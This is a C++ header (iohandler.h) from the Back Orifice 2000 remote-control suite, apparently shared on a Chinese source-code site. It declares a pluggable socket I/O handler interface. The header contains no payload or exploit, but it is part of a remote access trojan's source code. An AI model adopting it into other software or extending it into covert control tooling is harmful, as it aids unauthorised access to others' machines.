iohandler.h
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:3k
源码类别:

远程控制编程

开发平台:

WINDOWS

  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  3.     This file is free software, and not subject to GNU Public License
  4. restrictions; you can redistribute it and/or modify it in any way 
  5. you see fit. This file is suitable for inclusion in a derivative
  6. work, regardless of license on the work or availability of source code
  7. to the work. If you redistribute this file, you must leave this
  8. header intact.
  9.     
  10. This program is distributed in the hope that it will be useful,
  11.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  12.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  
  13. The author of this program may be contacted at dildog@l0pht.com. */
  14. #ifndef __INC_IOHANDLER_H
  15. #define __INC_IOHANDLER_H
  16. #include<windows.h>
  17. #define MAX_IO_HANDLERS 8
  18. #define INVALID_IO_HANDLER ((IO_HANDLER *) NULL)
  19. // Socket class
  20. #pragma pack(push, 1)
  21. // IO Handler Structure
  22. typedef struct {
  23. char *(__cdecl *pQuery)(void);
  24. int (__cdecl *pInsert)(void);
  25. int (__cdecl *pRemove)(void);
  26. void *(__cdecl *pListen)(char *svTarget);
  27. void *(__cdecl *pConnect)(char *svTarget);
  28. void *(__cdecl *pAccept)(void *pInternal, char *svAddr, int nMaxLen);
  29. int (__cdecl *pClose)(void *pInternal);
  30. int (__cdecl *pRecv)(void *pInternal, BYTE **pInData, int *pnInDataLen);
  31. int (__cdecl *pSend)(void *pInternal, BYTE *pData, int nDataLen);
  32. void  (__cdecl *pFree)(void *pInternal, BYTE *pBuffer);
  33. int (__cdecl *pGetConnectAddr)(void *pInternal, char *svTarget, int nMaxLen);
  34. } IO_HANDLER;
  35. class CIOSocket {
  36. private:
  37. IO_HANDLER *m_pHandler;
  38. void *m_pData;
  39. char m_svRmtAddr[256];
  40. public:
  41. CIOSocket(IO_HANDLER *pHandler);
  42. virtual ~CIOSocket();
  43. virtual int Listen(char *svTarget);
  44. virtual int Connect(char *svTarget);
  45. virtual CIOSocket *Accept(void);
  46. virtual int Close(void);
  47. virtual int Recv(BYTE **pInData, int *pnInDataLen);
  48. virtual int Send(BYTE *pData, int nDataLen);
  49. virtual void Free(BYTE *pBuffer);
  50. virtual int GetRemoteAddr(char *svAddr,int nMaxLen);
  51. virtual int GetConnectAddr(char *svAddr,int nMaxLen);
  52. };
  53. #pragma pack(pop)
  54. // IO Handler Manager Functions
  55. class CIOHandler {
  56. private:
  57. IO_HANDLER *m_IOHandler[MAX_IO_HANDLERS];
  58. public:
  59. CIOHandler();
  60. virtual ~CIOHandler();
  61. virtual int Insert(IO_HANDLER *handler);
  62. virtual int Remove(int handlernum);
  63. virtual char *Query(int nHandler);
  64. virtual int GetHandlerCount(void);
  65. virtual IO_HANDLER *GetHandler(int nHandler);
  66. virtual IO_HANDLER *GetHandlerByID(char *svID);
  67. };
  68. #endif